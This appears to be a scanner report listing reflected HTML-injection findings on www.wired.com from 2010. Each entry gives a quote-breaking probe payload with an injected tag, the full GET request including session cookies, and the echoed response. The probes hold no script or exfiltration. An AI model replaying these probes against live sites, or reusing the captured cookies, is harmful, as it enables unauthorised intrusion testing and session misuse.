GET /ajax/widgets310b1"><a>8982e2d5c82/related/content/blogPost/reviews_25843 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:51 GMT Date: Mon, 22 Nov 2010 01:10:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets310b1"><a>8982e2d5c82 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2273e"><a>e3e8aa7828e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related2273e"><a>e3e8aa7828e/content/blogPost/reviews_25843 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:10 GMT Date: Mon, 22 Nov 2010 01:11:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related2273e"><a>e3e8aa7828e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e10a5"><a>295271ef989 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxe10a5"><a>295271ef989/widgets/related/content/blogPost/threatlevel_20877 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:25 GMT Date: Mon, 22 Nov 2010 01:10:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxe10a5"><a>295271ef989 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dffe"><a>cc5a2c835a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets9dffe"><a>cc5a2c835a1/related/content/blogPost/threatlevel_20877 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=235 Expires: Mon, 22 Nov 2010 01:14:45 GMT Date: Mon, 22 Nov 2010 01:10:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets9dffe"><a>cc5a2c835a1 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e38f1"><a>6244b533a3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatede38f1"><a>6244b533a3a/content/blogPost/threatlevel_20877 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=234 Expires: Mon, 22 Nov 2010 01:15:02 GMT Date: Mon, 22 Nov 2010 01:11:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatede38f1"><a>6244b533a3a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ec0"><a>87032be8af7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax83ec0"><a>87032be8af7/widgets/related/content/blogPost/threatlevel_20913 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=230 Expires: Mon, 22 Nov 2010 01:14:06 GMT Date: Mon, 22 Nov 2010 01:10:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax83ec0"><a>87032be8af7 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfa0d"><a>6a79b0a2118 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgetsdfa0d"><a>6a79b0a2118/related/content/blogPost/threatlevel_20913 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:14:31 GMT Date: Mon, 22 Nov 2010 01:10:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgetsdfa0d"><a>6a79b0a2118 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced2f"><a>d31ee7a0ba1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedced2f"><a>d31ee7a0ba1/content/blogPost/threatlevel_20913 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:08 GMT Date: Mon, 22 Nov 2010 01:11:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatedced2f"><a>d31ee7a0ba1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb42"><a>82cb0a5692c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxabb42"><a>82cb0a5692c/widgets/related/content/blogPost/threatlevel_7588 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=237 Expires: Mon, 22 Nov 2010 01:14:27 GMT Date: Mon, 22 Nov 2010 01:10:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxabb42"><a>82cb0a5692c ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b1b"><a>6f0f8c7e998 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets97b1b"><a>6f0f8c7e998/related/content/blogPost/threatlevel_7588 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:14:41 GMT Date: Mon, 22 Nov 2010 01:10:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets97b1b"><a>6f0f8c7e998 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f606f"><a>222e926617f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedf606f"><a>222e926617f/content/blogPost/threatlevel_7588 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:15 GMT Date: Mon, 22 Nov 2010 01:11:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatedf606f"><a>222e926617f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3862"><a>16338f02f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxe3862"><a>16338f02f90/widgets/related/content/blogPost/underwire_53528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:06 GMT Date: Mon, 22 Nov 2010 01:10:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxe3862"><a>16338f02f90 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9a4"><a>f176c1e030e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgetseb9a4"><a>f176c1e030e/related/content/blogPost/underwire_53528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:45 GMT Date: Mon, 22 Nov 2010 01:10:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgetseb9a4"><a>f176c1e030e c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a940d"><a>ad6ce4969ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relateda940d"><a>ad6ce4969ca/content/blogPost/underwire_53528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:01 GMT Date: Mon, 22 Nov 2010 01:11:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relateda940d"><a>ad6ce4969ca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e36"><a>663daf42f79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blogs37e36"><a>663daf42f79 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.wired.com/
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29320 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 22:29:37 GMT Date: Sun, 21 Nov 2010 22:25:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_blogs37e36"><a>663daf42f79"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7458"><a>0bc4e457d49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blogsb7458"><a>0bc4e457d49/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=235 Expires: Sun, 21 Nov 2010 20:14:10 GMT Date: Sun, 21 Nov 2010 20:10:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_blogsb7458"><a>0bc4e457d49"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 808a6"><a>226b4160ebe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars808a6"><a>226b4160ebe HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:09 GMT Date: Mon, 22 Nov 2010 01:11:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars808a6"><a>226b4160ebe"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 847ce"><a>650bafdb219 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars847ce"><a>650bafdb219/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29299 Vary: Accept-Encoding Cache-Control: max-age=223 Expires: Sun, 21 Nov 2010 20:15:22 GMT Date: Sun, 21 Nov 2010 20:11:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars847ce"><a>650bafdb219"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215d7"><a>d31fce4364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars215d7"><a>d31fce4364/coolwheels HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:09:51 GMT Date: Sun, 21 Nov 2010 23:05:51 GMT Connection: close
